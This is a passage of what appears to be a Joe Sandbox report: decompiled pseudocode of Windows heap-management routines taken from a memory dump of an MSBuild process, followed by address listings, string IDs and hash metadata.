                                            								if( *0x10f7bc8 == 0) {
                                            									__eflags = 1;
                                            									E010C2073(_t445, 1, _t541, 1);
                                            								}
                                            								_t513 = _v48;
                                            								_t445 = _a4;
                                            							}
                                            						}
                                            						_t350 = _v40;
                                            						_t480 = _t445 << 3;
                                            						_v20 = _t480;
                                            						_t481 = _t480 + _t513;
                                            						_v24 = _t481;
                                            						__eflags = _t350;
                                            						if(_t350 == 0) {
                                            							_t481 = _t481 + 0xfffffff0;
                                            							__eflags = _t481;
                                            						}
                                            						_t483 = (_t481 & 0xfffff000) - _v44;
                                            						__eflags = _t483;
                                            						_v52 = _t483;
                                            						if(_t483 == 0) {
                                            							__eflags =  *0x10f8748 - 1;
                                            							if( *0x10f8748 < 1) {
                                            								goto L9;
                                            							}
                                            							__eflags = _t350;
                                            							goto L146;
                                            						} else {
                                            							_t352 = E0103174B( &_v44,  &_v52, 0x4000);
                                            							__eflags = _t352;
                                            							if(_t352 < 0) {
                                            								goto L94;
                                            							}
                                            							_t353 = E01027D50();
                                            							_t447 = 0x7ffe0380;
                                            							__eflags = _t353;
                                            							if(_t353 != 0) {
                                            								_t356 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                            							} else {
                                            								_t356 = 0x7ffe0380;
                                            							}
                                            							__eflags =  *_t356;
                                            							if( *_t356 != 0) {
                                            								_t357 =  *[fs:0x30];
                                            								__eflags =  *(_t357 + 0x240) & 0x00000001;
                                            								if(( *(_t357 + 0x240) & 0x00000001) != 0) {
                                            									E010C14FB(_t447, _t553, _v44, _v52, 5);
                                            								}
                                            							}
                                            							_t358 = _v32;
                                            							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
                                            							_t484 =  *((intOrPtr*)(_v32 + 0x14));
                                            							__eflags = _t484 - 0x7f000;
                                            							if(_t484 >= 0x7f000) {
                                            								_t90 = _t553 + 0x1ec;
                                            								 *_t90 =  *(_t553 + 0x1ec) - _t484;
                                            								__eflags =  *_t90;
                                            							}
                                            							E01009373(_t553, _t358);
                                            							_t486 = _v32;
                                            							 *((intOrPtr*)(_v32 + 0x14)) =  *((intOrPtr*)(_v32 + 0x14)) + _v52;
                                            							E01009819(_t486);
                                            							 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) + (_v52 >> 0xc);
                                            							 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) - _v52;
                                            							_t366 =  *((intOrPtr*)(_v32 + 0x14));
                                            							__eflags = _t366 - 0x7f000;
                                            							if(_t366 >= 0x7f000) {
                                            								_t104 = _t553 + 0x1ec;
                                            								 *_t104 =  *(_t553 + 0x1ec) + _t366;
                                            								__eflags =  *_t104;
                                            							}
                                            							__eflags = _v40;
                                            							if(_v40 == 0) {
                                            								_t533 = _v52 + _v44;
                                            								_v32 = _t533;
                                            								_t533[2] =  *((intOrPtr*)(_t553 + 0x54));
                                            								__eflags = _v24 - _v52 + _v44;
                                            								if(_v24 == _v52 + _v44) {
                                            									__eflags =  *(_t553 + 0x4c);
                                            									if( *(_t553 + 0x4c) != 0) {
                                            										_t533[1] = _t533[1] ^ _t533[0] ^  *_t533;
                                            										 *_t533 =  *_t533 ^  *(_t553 + 0x50);
                                            									}
                                            								} else {
                                            									_t449 = 0;
                                            									_t533[3] = 0;
                                            									_t533[1] = 0;
                                            									_t394 = _v20 - _v52 >> 0x00000003 & 0x0000ffff;
                                            									_t491 = _t394;
                                            									 *_t533 = _t394;
                                            									__eflags =  *0x10f8748 - 1; // 0x0
                                            									if(__eflags >= 0) {
                                            										__eflags = _t491 - 1;
                                            										if(_t491 <= 1) {
                                            											_t404 =  *[fs:0x30];
                                            											__eflags =  *(_t404 + 0xc);
                                            											if( *(_t404 + 0xc) == 0) {
                                            												_push("HEAP: ");
                                            												E0100B150();
                                            											} else {
                                            												E0100B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            											}
                                            											_push("((LONG)FreeEntry->Size > 1)");
                                            											E0100B150();
                                            											_pop(_t491);
                                            											__eflags =  *0x10f7bc8 - _t449; // 0x0
                                            											if(__eflags == 0) {
                                            												__eflags = 0;
                                            												_t491 = 1;
                                            												E010C2073(_t449, 1, _t541, 0);
                                            											}
                                            											_t533 = _v32;
                                            										}
                                            									}
                                            									_t533[1] = _t449;
                                            									__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
                                            									if( *((intOrPtr*)(_t541 + 0x18)) != _t541) {
                                            										_t402 = (_t533 - _t541 >> 0x10) + 1;
                                            										_v16 = _t402;
                                            										__eflags = _t402 - 0xfe;
                                            										if(_t402 >= 0xfe) {
                                            											_push(_t491);
                                            											_push(_t449);
                                            											E010CA80D( *((intOrPtr*)(_t541 + 0x18)), 3, _t533, _t541);
                                            											_t533 = _v48;
                                            											_t402 = _v32;
                                            										}
                                            										_t449 = _t402;
                                            									}
                                            									_t533[3] = _t449;
                                            									E0102A830(_t553, _t533,  *_t533 & 0x0000ffff);
                                            									_t447 = 0x7ffe0380;
                                            								}
                                            							}
                                            							_t367 = E01027D50();
                                            							__eflags = _t367;
                                            							if(_t367 != 0) {
                                            								_t370 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                            							} else {
                                            								_t370 = _t447;
                                            							}
                                            							__eflags =  *_t370;
                                            							if( *_t370 != 0) {
                                            								_t371 =  *[fs:0x30];
                                            								__eflags =  *(_t371 + 0x240) & 1;
                                            								if(( *(_t371 + 0x240) & 1) != 0) {
                                            									__eflags = E01027D50();
                                            									if(__eflags != 0) {
                                            										_t447 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                            										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                            									}
                                            									E010C1411(_t447, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _v40, _v36,  *_t447 & 0x000000ff);
                                            								}
                                            							}
                                            							_t372 = E01027D50();
                                            							_t546 = 0x7ffe038a;
                                            							_t446 = 0x230;
                                            							__eflags = _t372;
                                            							if(_t372 != 0) {
                                            								_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                            							} else {
                                            								_t246 = 0x7ffe038a;
                                            							}
                                            							__eflags =  *_t246;
                                            							if( *_t246 == 0) {
                                            								goto L7;
                                            							} else {
                                            								__eflags = E01027D50();
                                            								if(__eflags != 0) {
                                            									_t546 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + _t446;
                                            									__eflags = _t546;
                                            								}
                                            								_push( *_t546 & 0x000000ff);
                                            								_push(_v36);
                                            								_push(_v40);
                                            								goto L120;
                                            							}
                                            						}
                                            					} else {
                                            						L19:
                                            						_t31 = _t513 + 0x101f; // 0x101f
                                            						_t455 = _t31 & 0xfffff000;
                                            						_t32 = _t513 + 0x28; // 0x28
                                            						_v44 = _t455;
                                            						__eflags = _t455 - _t32;
                                            						if(_t455 == _t32) {
                                            							_t455 = _t455 + 0x1000;
                                            							_v44 = _t455;
                                            						}
                                            						_t265 = _t445 << 3;
                                            						_v24 = _t265;
                                            						_t266 = _t265 + _t513;
                                            						__eflags = _v40;
                                            						_v20 = _t266;
                                            						if(_v40 == 0) {
                                            							_t266 = _t266 + 0xfffffff0;
                                            							__eflags = _t266;
                                            						}
                                            						_t267 = _t266 & 0xfffff000;
                                            						_v52 = _t267;
                                            						__eflags = _t267 - _t455;
                                            						if(_t267 < _t455) {
                                            							__eflags =  *0x10f8748 - 1; // 0x0
                                            							if(__eflags < 0) {
                                            								L9:
                                            								_t450 = _t553;
                                            								L10:
                                            								_push(_t445);
                                            								goto L11;
                                            							}
                                            							__eflags = _v40;
                                            							L146:
                                            							if(__eflags == 0) {
                                            								goto L9;
                                            							}
                                            							_t270 =  *[fs:0x30];
                                            							__eflags =  *(_t270 + 0xc);
                                            							if( *(_t270 + 0xc) == 0) {
                                            								_push("HEAP: ");
                                            								E0100B150();
                                            							} else {
                                            								E0100B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            							}
                                            							_push("(!TrailingUCR)");
                                            							E0100B150();
                                            							__eflags =  *0x10f7bc8;
                                            							if( *0x10f7bc8 == 0) {
                                            								__eflags = 0;
                                            								E010C2073(_t445, 1, _t541, 0);
                                            							}
                                            							L152:
                                            							_t445 = _a4;
                                            							L153:
                                            							_t513 = _v48;
                                            							goto L9;
                                            						}
                                            						_v32 = _t267;
                                            						_t280 = _t267 - _t455;
                                            						_v32 = _v32 - _t455;
                                            						__eflags = _a8;
                                            						_t460 = _v32;
                                            						_v52 = _t460;
                                            						if(_a8 != 0) {
                                            							L27:
                                            							__eflags = _t280;
                                            							if(_t280 == 0) {
                                            								L33:
                                            								_t446 = 0;
                                            								__eflags = _v40;
                                            								if(_v40 == 0) {
                                            									_t468 = _v44 + _v52;
                                            									_v36 = _t468;
                                            									_t468[2] =  *((intOrPtr*)(_t553 + 0x54));
                                            									__eflags = _v20 - _v52 + _v44;
                                            									if(_v20 == _v52 + _v44) {
                                            										__eflags =  *(_t553 + 0x4c);
                                            										if( *(_t553 + 0x4c) != 0) {
                                            											_t468[1] = _t468[1] ^ _t468[0] ^  *_t468;
                                            											 *_t468 =  *_t468 ^  *(_t553 + 0x50);
                                            										}
                                            									} else {
                                            										_t468[3] = 0;
                                            										_t468[1] = 0;
                                            										_t317 = _v24 - _v52 - _v44 + _t513 >> 0x00000003 & 0x0000ffff;
                                            										_t521 = _t317;
                                            										 *_t468 = _t317;
                                            										__eflags =  *0x10f8748 - 1; // 0x0
                                            										if(__eflags >= 0) {
                                            											__eflags = _t521 - 1;
                                            											if(_t521 <= 1) {
                                            												_t327 =  *[fs:0x30];
                                            												__eflags =  *(_t327 + 0xc);
                                            												if( *(_t327 + 0xc) == 0) {
                                            													_push("HEAP: ");
                                            													E0100B150();
                                            												} else {
                                            													E0100B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            												}
                                            												_push("(LONG)FreeEntry->Size > 1");
                                            												E0100B150();
                                            												__eflags =  *0x10f7bc8 - _t446; // 0x0
                                            												if(__eflags == 0) {
                                            													__eflags = 1;
                                            													E010C2073(_t446, 1, _t541, 1);
                                            												}
                                            												_t468 = _v36;
                                            											}
                                            										}
                                            										_t468[1] = _t446;
                                            										_t522 =  *((intOrPtr*)(_t541 + 0x18));
                                            										__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
                                            										if( *((intOrPtr*)(_t541 + 0x18)) == _t541) {
                                            											_t320 = _t446;
                                            										} else {
                                            											_t320 = (_t468 - _t541 >> 0x10) + 1;
                                            											_v12 = _t320;
                                            											__eflags = _t320 - 0xfe;
                                            											if(_t320 >= 0xfe) {
                                            												_push(_t468);
                                            												_push(_t446);
                                            												E010CA80D(_t522, 3, _t468, _t541);
                                            												_t468 = _v52;
                                            												_t320 = _v28;
                                            											}
                                            										}
                                            										_t468[3] = _t320;
                                            										E0102A830(_t553, _t468,  *_t468 & 0x0000ffff);
                                            									}
                                            								}
                                            								E0102B73D(_t553, _t541, _v44 + 0xffffffe8, _v52, _v48,  &_v8);
                                            								E0102A830(_t553, _v64, _v24);
                                            								_t286 = E01027D50();
                                            								_t542 = 0x7ffe0380;
                                            								__eflags = _t286;
                                            								if(_t286 != 0) {
                                            									_t289 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                            								} else {
                                            									_t289 = 0x7ffe0380;
                                            								}
                                            								__eflags =  *_t289;
                                            								if( *_t289 != 0) {
                                            									_t290 =  *[fs:0x30];
                                            									__eflags =  *(_t290 + 0x240) & 1;
                                            									if(( *(_t290 + 0x240) & 1) != 0) {
                                            										__eflags = E01027D50();
                                            										if(__eflags != 0) {
                                            											_t542 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                            											__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                            										}
                                            										E010C1411(_t446, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _t446, _t446,  *_t542 & 0x000000ff);
                                            									}
                                            								}
                                            								_t291 = E01027D50();
                                            								_t543 = 0x7ffe038a;
                                            								__eflags = _t291;
                                            								if(_t291 != 0) {
                                            									_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                            								} else {
                                            									_t246 = 0x7ffe038a;
                                            								}
                                            								__eflags =  *_t246;
                                            								if( *_t246 != 0) {
                                            									__eflags = E01027D50();
                                            									if(__eflags != 0) {
                                            										_t543 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                            										__eflags = _t543;
                                            									}
                                            									_push( *_t543 & 0x000000ff);
                                            									_push(_t446);
                                            									_push(_t446);
                                            									L120:
                                            									_push( *(_t553 + 0x74) << 3);
                                            									_push(_v52);
                                            									_t246 = E010C1411(_t446, _t553, _v44, __eflags);
                                            								}
                                            								goto L7;
                                            							}
                                            							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
                                            							_t339 = E0103174B( &_v44,  &_v52, 0x4000);
                                            							__eflags = _t339;
                                            							if(_t339 < 0) {
                                            								L94:
                                            								 *((intOrPtr*)(_t553 + 0x210)) =  *((intOrPtr*)(_t553 + 0x210)) + 1;
                                            								__eflags = _v40;
                                            								if(_v40 == 0) {
                                            									goto L153;
                                            								}
                                            								E0102B73D(_t553, _t541, _v28 + 0xffffffe8, _v36, _v48,  &_a4);
                                            								goto L152;
                                            							}
                                            							_t344 = E01027D50();
                                            							__eflags = _t344;
                                            							if(_t344 != 0) {
                                            								_t347 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                            							} else {
                                            								_t347 = 0x7ffe0380;
                                            							}
                                            							__eflags =  *_t347;
                                            							if( *_t347 != 0) {
                                            								_t348 =  *[fs:0x30];
                                            								__eflags =  *(_t348 + 0x240) & 1;
                                            								if(( *(_t348 + 0x240) & 1) != 0) {
                                            									E010C14FB(_t445, _t553, _v44, _v52, 6);
                                            								}
                                            							}
                                            							_t513 = _v48;
                                            							goto L33;
                                            						}
                                            						__eflags =  *_v12 - 3;
                                            						_t513 = _v48;
                                            						if( *_v12 == 3) {
                                            							goto L27;
                                            						}
                                            						__eflags = _t460;
                                            						if(_t460 == 0) {
                                            							goto L9;
                                            						}
                                            						__eflags = _t460 -  *((intOrPtr*)(_t553 + 0x6c));
                                            						if(_t460 <  *((intOrPtr*)(_t553 + 0x6c))) {
                                            							goto L9;
                                            						}
                                            						goto L27;
                                            					}
                                            				}
                                            				_t445 = _a4;
                                            				if(_t445 <  *((intOrPtr*)(__ecx + 0x6c))) {
                                            					_t513 = __edx;
                                            					goto L10;
                                            				}
                                            				_t433 =  *((intOrPtr*)(__ecx + 0x74)) + _t445;
                                            				_v20 = _t433;
                                            				if(_t433 <  *((intOrPtr*)(__ecx + 0x70)) || _v20 <  *(__ecx + 0x1e8) >>  *((intOrPtr*)(__ecx + 0x240)) + 3) {
                                            					_t513 = _t539;
                                            					goto L9;
                                            				} else {
                                            					_t437 = E010299BF(__ecx, __edx,  &_a4, 0);
                                            					_t445 = _a4;
                                            					_t514 = _t437;
                                            					_v56 = _t514;
                                            					if(_t445 - 0x201 > 0xfbff) {
                                            						goto L14;
                                            					} else {
                                            						E0102A830(__ecx, _t514, _t445);
                                            						_t506 =  *(_t553 + 0x238);
                                            						_t551 =  *((intOrPtr*)(_t553 + 0x1e8)) - ( *(_t553 + 0x74) << 3);
                                            						_t246 = _t506 >> 4;
                                            						if(_t551 < _t506 - _t246) {
                                            							_t508 =  *(_t553 + 0x23c);
                                            							_t246 = _t508 >> 2;
                                            							__eflags = _t551 - _t508 - _t246;
                                            							if(_t551 > _t508 - _t246) {
                                            								_t246 = E0103ABD8(_t553);
                                            								 *(_t553 + 0x23c) = _t551;
                                            								 *(_t553 + 0x238) = _t551;
                                            							}
                                            						}
                                            						goto L7;
                                            					}
                                            				}
                                            			}
                                            0x0102a636
                                            0x0102a63a
                                            0x0102a63c
                                            0x0102a640
                                            0x0102a642
                                            0x0102a644
                                            0x0102a644
                                            0x0102a644
                                            0x0102a64d
                                            0x0102a64d
                                            0x0102a651
                                            0x0102a655
                                            0x01071eca
                                            0x01071ed1
                                            0x00000000
                                            0x00000000
                                            0x01071ed7
                                            0x00000000
                                            0x0102a65b
                                            0x0102a669
                                            0x0102a66e
                                            0x0102a670
                                            0x00000000
                                            0x00000000
                                            0x0102a676
                                            0x0102a67b
                                            0x0102a680
                                            0x0102a682
                                            0x01071f1a
                                            0x0102a688
                                            0x0102a688
                                            0x0102a688
                                            0x0102a68a
                                            0x0102a68d
                                            0x01071f24
                                            0x01071f2a
                                            0x01071f31
                                            0x01071f43
                                            0x01071f43
                                            0x01071f31
                                            0x0102a693
                                            0x0102a697
                                            0x0102a69d
                                            0x0102a6a0
                                            0x0102a6a6
                                            0x0102a6a8
                                            0x0102a6a8
                                            0x0102a6a8
                                            0x0102a6a8
                                            0x0102a6b2
                                            0x0102a6b7
                                            0x0102a6c1
                                            0x0102a6c6
                                            0x0102a6d2
                                            0x0102a6d9
                                            0x0102a6e3
                                            0x0102a6e6
                                            0x0102a6eb
                                            0x0102a6ed
                                            0x0102a6ed
                                            0x0102a6ed
                                            0x0102a6ed
                                            0x0102a6f3
                                            0x0102a6f8
                                            0x0102a702
                                            0x0102a70a
                                            0x0102a70e
                                            0x0102a71a
                                            0x0102a71e
                                            0x01071fcb
                                            0x01071fcf
                                            0x01071fdd
                                            0x01071fe3
                                            0x01071fe3
                                            0x0102a724
                                            0x0102a728
                                            0x0102a72a
                                            0x0102a72d
                                            0x0102a737
                                            0x0102a73a
                                            0x0102a73c
                                            0x0102a742
                                            0x0102a748
                                            0x01071f4d
                                            0x01071f50
                                            0x01071f56
                                            0x01071f5c
                                            0x01071f5f
                                            0x01071f7e
                                            0x01071f83
                                            0x01071f61
                                            0x01071f76
                                            0x01071f7b
                                            0x01071f89
                                            0x01071f8e
                                            0x01071f93
                                            0x01071f94
                                            0x01071f9a
                                            0x01071f9c
                                            0x01071f9e
                                            0x01071fa1
                                            0x01071fa1
                                            0x01071fa6
                                            0x01071fa6
                                            0x01071f50
                                            0x0102a74e
                                            0x0102a751
                                            0x0102a754
                                            0x0102a75d
                                            0x0102a75e
                                            0x0102a762
                                            0x0102a767
                                            0x01071faf
                                            0x01071fb0
                                            0x01071fb9
                                            0x01071fbe
                                            0x01071fc2
                                            0x01071fc2
                                            0x0102a76d
                                            0x0102a76d
                                            0x0102a775
                                            0x0102a778
                                            0x0102a77d
                                            0x0102a77d
                                            0x0102a71e
                                            0x0102a782
                                            0x0102a787
                                            0x0102a789
                                            0x01071ff3
                                            0x0102a78f
                                            0x0102a78f
                                            0x0102a78f
                                            0x0102a791
                                            0x0102a794
                                            0x01071ffd
                                            0x01072006
                                            0x0107200c
                                            0x01072017
                                            0x01072019
                                            0x01072024
                                            0x01072024
                                            0x01072024
                                            0x01072047
                                            0x01072047
                                            0x0107200c
                                            0x0102a79a
                                            0x0102a79f
                                            0x0102a7a4
                                            0x0102a7a9
                                            0x0102a7ab
                                            0x0107205a
                                            0x0102a7b1
                                            0x0102a7b1
                                            0x0102a7b1
                                            0x0102a7b3
                                            0x0102a7b6
                                            0x00000000
                                            0x0102a7bc
                                            0x01072066
                                            0x01072068
                                            0x01072073
                                            0x01072073
                                            0x01072073
                                            0x01072078
                                            0x01072079
                                            0x0107207d
                                            0x00000000
                                            0x0107207d
                                            0x0102a7b6
                                            0x0102a440
                                            0x0102a440
                                            0x0102a440
                                            0x0102a446
                                            0x0102a44c
                                            0x0102a44f
                                            0x0102a453
                                            0x0102a455
                                            0x010720b3
                                            0x010720b9
                                            0x010720b9
                                            0x0102a45d
                                            0x0102a460
                                            0x0102a464
                                            0x0102a466
                                            0x0102a46b
                                            0x0102a46f
                                            0x0102a471
                                            0x0102a471
                                            0x0102a471
                                            0x0102a474
                                            0x0102a479
                                            0x0102a47d
                                            0x0102a47f
                                            0x01072229
                                            0x0107222f
                                            0x0102a3c8
                                            0x0102a3c8
                                            0x0102a3ca
                                            0x0102a3ca
                                            0x00000000
                                            0x0102a3ca
                                            0x01072235
                                            0x0107223a
                                            0x0107223a
                                            0x00000000
                                            0x00000000
                                            0x01072240
                                            0x01072246
                                            0x0107224a
                                            0x01072269
                                            0x0107226e
                                            0x0107224c
                                            0x01072261
                                            0x01072266
                                            0x01072274
                                            0x01072279
                                            0x0107227e
                                            0x01072286
                                            0x01072288
                                            0x0107228d
                                            0x0107228d
                                            0x01072292
                                            0x01072292
                                            0x01072295
                                            0x01072295
                                            0x00000000
                                            0x01072295
                                            0x0102a485
                                            0x0102a489
                                            0x0102a48b
                                            0x0102a48f
                                            0x0102a493
                                            0x0102a497
                                            0x0102a49b
                                            0x0102a4bb
                                            0x0102a4bb
                                            0x0102a4bd
                                            0x0102a4ff
                                            0x0102a4ff
                                            0x0102a501
                                            0x0102a505
                                            0x0102a50f
                                            0x0102a517
                                            0x0102a51b
                                            0x0102a527
                                            0x0102a52b
                                            0x01072182
                                            0x01072185
                                            0x01072193
                                            0x01072199
                                            0x01072199
                                            0x0102a531
                                            0x0102a535
                                            0x0102a538
                                            0x0102a548
                                            0x0102a54b
                                            0x0102a54d
                                            0x0102a553
                                            0x0102a559
                                            0x01072100
                                            0x01072103
                                            0x01072109
                                            0x0107210f
                                            0x01072112
                                            0x01072131
                                            0x01072136
                                            0x01072114
                                            0x01072129
                                            0x0107212e
                                            0x0107213c
                                            0x01072141
                                            0x01072147
                                            0x0107214d
                                            0x01072151
                                            0x01072154
                                            0x01072154
                                            0x01072159
                                            0x01072159
                                            0x01072103
                                            0x0102a55f
                                            0x0102a562
                                            0x0102a565
                                            0x0102a567
                                            0x01072162
                                            0x0102a56d
                                            0x0102a574
                                            0x0102a575
                                            0x0102a579
                                            0x0102a57e
                                            0x01072169
                                            0x0107216a
                                            0x01072170
                                            0x01072175
                                            0x01072179
                                            0x01072179
                                            0x0102a57e
                                            0x0102a584
                                            0x0102a58f
                                            0x0102a58f
                                            0x0102a52b
                                            0x0102a5ad
                                            0x0102a5bc
                                            0x0102a5c1
                                            0x0102a5c6
                                            0x0102a5cb
                                            0x0102a5cd
                                            0x010721a9
                                            0x0102a5d3
                                            0x0102a5d3
                                            0x0102a5d3
                                            0x0102a5d5
                                            0x0102a5d8
                                            0x010721b3
                                            0x010721bc
                                            0x010721c2
                                            0x010721cd
                                            0x010721cf
                                            0x010721da
                                            0x010721da
                                            0x010721da
                                            0x010721f7
                                            0x010721f7
                                            0x010721c2
                                            0x0102a5de
                                            0x0102a5e3
                                            0x0102a5e8
                                            0x0102a5ea
                                            0x0107220a
                                            0x0102a5f0
                                            0x0102a5f0
                                            0x0102a5f0
                                            0x0102a5f2
                                            0x0102a5f5
                                            0x01072219
                                            0x0107221b
                                            0x0107208c
                                            0x0107208c
                                            0x0107208c
                                            0x01072095
                                            0x01072096
                                            0x01072097
                                            0x01072098
                                            0x010720a4
                                            0x010720a5
                                            0x010720a9
                                            0x010720a9
                                            0x00000000
                                            0x0102a5f5
                                            0x0102a4bf
                                            0x0102a4d3
                                            0x0102a4d8
                                            0x0102a4da
                                            0x01071ede
                                            0x01071ede
                                            0x01071ee4
                                            0x01071ee9
                                            0x00000000
                                            0x00000000
                                            0x01071f07
                                            0x00000000
                                            0x01071f07
                                            0x0102a4e0
                                            0x0102a4e5
                                            0x0102a4e7
                                            0x010720cb
                                            0x0102a4ed
                                            0x0102a4ed
                                            0x0102a4ed
                                            0x0102a4f2
                                            0x0102a4f5
                                            0x010720d5
                                            0x010720de
                                            0x010720e4
                                            0x010720f6
                                            0x010720f6
                                            0x010720e4
                                            0x0102a4fb
                                            0x00000000
                                            0x0102a4fb
                                            0x0102a4a1
                                            0x0102a4a4
                                            0x0102a4a8
                                            0x00000000
                                            0x00000000
                                            0x0102a4aa
                                            0x0102a4ac
                                            0x00000000
                                            0x00000000
                                            0x0102a4b2
                                            0x0102a4b5
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0102a4b5
                                            0x0102a43a
                                            0x0102a340
                                            0x0102a346
                                            0x0102a600
                                            0x00000000
                                            0x0102a600
                                            0x0102a34f
                                            0x0102a351
                                            0x0102a358
                                            0x0102a3c6
                                            0x00000000
                                            0x0102a371
                                            0x0102a37a
                                            0x0102a37f
                                            0x0102a382
                                            0x0102a384
                                            0x0102a394
                                            0x00000000
                                            0x0102a396
                                            0x0102a399
                                            0x0102a3a7
                                            0x0102a3b0
                                            0x0102a3b4
                                            0x0102a3bb
                                            0x0102a3d2
                                            0x0102a3da
                                            0x0102a3df
                                            0x0102a3e1
                                            0x0102a3e5
                                            0x0102a3ea
                                            0x0102a3f0
                                            0x0102a3f0
                                            0x0102a3e1
                                            0x00000000
                                            0x0102a3bb
                                            0x0102a394

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                            • API String ID: 0-523794902
                                            • Opcode ID: 4972dec88897be74928d57953f036d0f61e9780bde5f23848ceb824b32b425bb
                                            • Instruction ID: 4b64b678835ec9a99c2186d2f2375bc5e23b6cb1dff2fa22b5762dc249ed6804
                                            • Opcode Fuzzy Hash: 4972dec88897be74928d57953f036d0f61e9780bde5f23848ceb824b32b425bb
                                            • Instruction Fuzzy Hash: 7342DE30A04781DFD715CF28C884B6ABBE5BF98604F0489ADF5C68B792DB34D981CB52
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 64%
                                            			E010C2D82(void* __ebx, intOrPtr* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
                                            				signed int _t83;
                                            				signed char _t89;
                                            				intOrPtr _t90;
                                            				signed char _t101;
                                            				signed int _t102;
                                            				intOrPtr _t104;
                                            				signed int _t105;
                                            				signed int _t106;
                                            				intOrPtr _t108;
                                            				intOrPtr _t112;
                                            				short* _t130;
                                            				short _t131;
                                            				signed int _t148;
                                            				intOrPtr _t149;
                                            				signed int* _t154;
                                            				short* _t165;
                                            				signed int _t171;
                                            				void* _t182;
                                            
                                            				_push(0x44);
                                            				_push(0x10e0e80);
                                            				E0105D0E8(__ebx, __edi, __esi);
                                            				_t177 = __edx;
                                            				_t181 = __ecx;
                                            				 *((intOrPtr*)(_t182 - 0x44)) = __ecx;
                                            				 *((char*)(_t182 - 0x1d)) = 0;
                                            				 *(_t182 - 0x24) = 0;
                                            				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
                                            					 *((intOrPtr*)(_t182 - 4)) = 0;
                                            					 *((intOrPtr*)(_t182 - 4)) = 1;
                                            					_t83 = E010040E1("RtlAllocateHeap");
                                            					__eflags = _t83;
                                            					if(_t83 == 0) {
                                            						L48:
                                            						 *(_t182 - 0x24) = 0;
                                            						L49:
                                            						 *((intOrPtr*)(_t182 - 4)) = 0;
                                            						 *((intOrPtr*)(_t182 - 4)) = 0xfffffffe;
                                            						E010C30C4();
                                            						goto L50;
                                            					}
                                            					_t89 =  *(__ecx + 0x44) | __edx | 0x10000100;
                                            					 *(_t182 - 0x28) = _t89;
                                            					 *(_t182 - 0x3c) = _t89;
                                            					_t177 =  *(_t182 + 8);
                                            					__eflags = _t177;
                                            					if(_t177 == 0) {
                                            						_t171 = 1;
                                            						__eflags = 1;
                                            					} else {
                                            						_t171 = _t177;
                                            					}
                                            					_t148 =  *((intOrPtr*)(_t181 + 0x94)) + _t171 &  *(_t181 + 0x98);
                                            					__eflags = _t148 - 0x10;
                                            					if(_t148 < 0x10) {
                                            						_t148 = 0x10;
                                            					}
                                            					_t149 = _t148 + 8;
                                            					 *((intOrPtr*)(_t182 - 0x48)) = _t149;
                                            					__eflags = _t149 - _t177;
                                            					if(_t149 < _t177) {
                                            						L44:
                                            						_t90 =  *[fs:0x30];
                                            						__eflags =  *(_t90 + 0xc);
                                            						if( *(_t90 + 0xc) == 0) {
                                            							_push("HEAP: ");
                                            							E0100B150();
                                            						} else {
                                            							E0100B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            						}
                                            						_push( *((intOrPtr*)(_t181 + 0x78)));
                                            						E0100B150("Invalid allocation size - %Ix (exceeded %Ix)\n", _t177);
                                            						goto L48;
                                            					} else {
                                            						__eflags = _t149 -  *((intOrPtr*)(_t181 + 0x78));
                                            						if(_t149 >  *((intOrPtr*)(_t181 + 0x78))) {
                                            							goto L44;
                                            						}
                                            						__eflags = _t89 & 0x00000001;
                                            						if((_t89 & 0x00000001) != 0) {
                                            							_t178 =  *(_t182 - 0x28);
                                            						} else {
                                            							E0101EEF0( *((intOrPtr*)(_t181 + 0xc8)));
                                            							 *((char*)(_t182 - 0x1d)) = 1;
                                            							_t178 =  *(_t182 - 0x28) | 0x00000001;
                                            							 *(_t182 - 0x3c) =  *(_t182 - 0x28) | 0x00000001;
                                            						}
                                            						E010C4496(_t181, 0);
                                            						_t177 = L01024620(_t181, _t181, _t178,  *(_t182 + 8));
                                            						 *(_t182 - 0x24) = _t177;
